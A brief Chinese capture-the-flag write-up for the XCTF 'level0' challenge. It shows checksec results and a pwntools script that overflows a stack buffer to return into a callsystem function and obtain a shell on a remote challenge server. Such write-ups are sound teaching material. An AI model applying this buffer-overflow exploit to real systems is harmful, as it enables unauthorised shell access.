xman - level0

ret2text

checksec level0

1
2
3
4
5
6
7
$ checksec level0
[*] '/home/k1ea4c/桌面/xctf/level0/level0'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

开启NX保护是使栈区域的代码无法执行,所以没办法写 shellcode

IDA分析下,调用 callsystem 就可以拿到shell 了

栈结构

高地址 ret
ebp
低地址 buff rbp-80h

exp 脚本

1
2
3
4
5
6
7
8
9
from pwn import *

#sh = process('./level0')
sh = remote("159.138.137.79", 51829)
context(os='linux', arch='amd64')
callsystem = 0x0000000000400596
payload = (0x80+8)*b"a" + p64(callsystem)
sh.send(payload)
sh.interactive()